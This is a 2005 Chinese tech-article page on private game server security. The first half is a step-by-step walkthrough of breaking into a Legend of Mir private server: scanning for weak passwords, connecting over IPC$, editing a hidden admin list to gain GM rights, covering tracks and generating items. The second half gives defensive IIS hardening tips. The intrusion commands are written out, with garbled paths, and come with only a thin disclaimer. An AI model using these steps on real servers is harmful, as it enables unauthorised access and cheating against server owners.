游戏私服安全技巧全攻略之攻击篇(4)

中华网科技 http://tech.china.com 2005-07-26 11:52:24

【进入BBS】【进入聊天室】【 推荐给朋友 】【浏览字号：大 中 小】【关闭窗口】

　　
入侵传奇私服/充当非法GM

　　首先，我得声明，我写本文并不是教大家如何去黑4f，只是想以本文引起广大4f拥有者的注意

　　，提高自己的网管水平。

　　我爱玩游戏，但却玩得很菜，也没有时间去玩，只想玩着过瘾，所以，当我开始玩传奇时，

　　虽觉得是好玩，但玩盛大的简直是在受罪，升级慢，没好装备，处处受人欺负。所以，4f是明

　　智的选择，但进去时也没有好装备，也是受人欺负，难道我不可以做gm？试试，folling me！

　　找来一大堆4f的ip，开个x-scan扫吧。有了，还真不少，都是弱口令的，这些网管真菜呀。

　　选好一个，192.168.0.1，go！


　　打开cmd，

　　1）c:/>net use 192.168.0.1ipc$ /user:administrator

　　连接成功，

　　ok，连上了，成功在望，

　　2）c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txt

　　系统找不到指定的文件。

　　没有？不可能吧？唔，一定是隐藏了，没关系，再来，

　　3）c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txt

　　没有提示，成功了，

　　这次连复制也不用了，直接改吧，

　　4）c:>edit 192.168.0.1d$mirservermir200enviradminlist.txt


　　会打开个介面，看看里面有哪些gm，加个吧，自己记得就行了，改完保存退出

　　5）c:>attrib +r +h 192.168.0.1d$mirservermir200enviradminlist.txt

　　把adminilist.txt还原成只读隐藏，

　　好了，大功告成，快打扫脚印吧，别让人发现被入侵了，

　　现在，就等着系统重启了，等不及的话就在第五步让它重启，不过这样太危险了，还是等吧，

　　第二天注册个帐号，新建个之前加的人名进去，

　　/who

　　当前150人在线

　　哈，我就是gm了。赶快把自己升级，

　　@level -1

　　升级成功，255级，哈哈

　　再造出想要的装备，想要什么尽情造吧，

　　重复上面的把自己从adminlist.txt里删了，哈哈，好装备到手了，可以玩了

　　面记得有位朋友对加强对服务器安全性的解决方法进行了一系列的说明，讲得非常详细，但是我觉得还有很多需要补充的地方.微软的系统是漏洞和补丁著称，真正要对服务器的安全配置确实非常困难，考虑的方面也太多了.

　　今天先讲一个方面的内容了，也算是对前面的朋友的进一步补充吧！

　　前面那位朋友所概述的主要是针对WIN2000系统弱口令的安全设置！他已经说得很仔细了，做到那些，口令这一关差不多了.确实在互联网的时代，口令真的非常重要.我对国外的主机进行了一系列的测试，就拿有弱口令的系统来说，还有不少！其中也包括了不少中小型企业的WEB服务器，E-MAIL，PROXY服务器都有这种低级的错误！

　　如果说你在这方面做得非常的仔细.但你至少还要仔细研究一下你主机现在所运行的有哪些服务，这些服务代表着什么?你应该很清楚！因为现在黑客软件，木马工具，远程控制软件大多是以一种服务的形式运行在你的服务器系统里，一般的防火墙，杀毒软件对其并没有任何反映的.对于服务形式出现的控制工具.比较难得发现，所以你就必须在服务器里运行的哪些服务非常熟悉.对于陌生或奇怪的服务应该安全设置好.

　　下面我都WIN2000的WWW(IIS)服务器安全配置略讲一下，WWW服务在WIN2000SERVER，ADSERVER，DATACENTERSERVER，版本中是默认安装的，如果你不需要用2000的WWW服务的话，建议不要安装.至于添加/删除你可以控制面板的去掉他的安装，或者在管理工具/服务里设置WORD WIDE WEB SERVICE启动类型为手动/禁用

　　这样的话系统就不默认启动改服务！

　　如果你需要用IIS来建站宣传一下自己的私服，你就必须按以下方法安全配置好IIS，

　　在IIS组件你首先要去掉你不需要的SMTP，SNNP，FTP，这样的话你可以降低你服务器运行所占用的CPU资源，和内存使用率.然后建议你删除你C:INTERPUB目录下的所有内容！或者更改路径.在IIS管理器中删除默认站点，(或者删除SCRIPTS这个虚拟目录)因为这个目录有可写的权限的.在新建的WEB站点中，设置IIS的权置，必须让它不能写入，或运行.因为IIS是默认支持ASP脚本的.然后在IIS中删除不需要的映射，这个很重要.如果你要支持PHP，CGI脚本的话，你还得配置好PHP.CGI的应用程序的正确映射，禁用或删除FSO组件，(去年深圳之窗就是被人家利用FSO黑了......)如果你要使用FSO的话，最好要改名！否则的话，你给别人提供主页上传的话，你肯定是会被黑的。小心呀！

　　目前在黑客横行的互联网空间中，利用IIS的漏洞，提申自己的权限，而成为AD，这些只是轻而易举的事情，这不需要花几天的时间去暴力破解一下口令，像自己架设的WEB服务器有种情况，更是数不甚数了.关于怎利用UNICODE漏洞去提供AD权限的文章，网上太多了，我就不多讲了.

　　这些来说应该是服务器安全防范方面的一个例子而已，真正要做到服务器的安全运行，需要你花大量的时间去摸索.因为这些来说，足以应付一些无聊的.....当然了，你如果需要WEB服务器，我还是建议你去使用AP了.他的源代码开发，免费，安全性稳定性都比IIS强得多了.

首页 上页 | ...1| 2 | 3 | 4 | 下页 尾页  共 4 页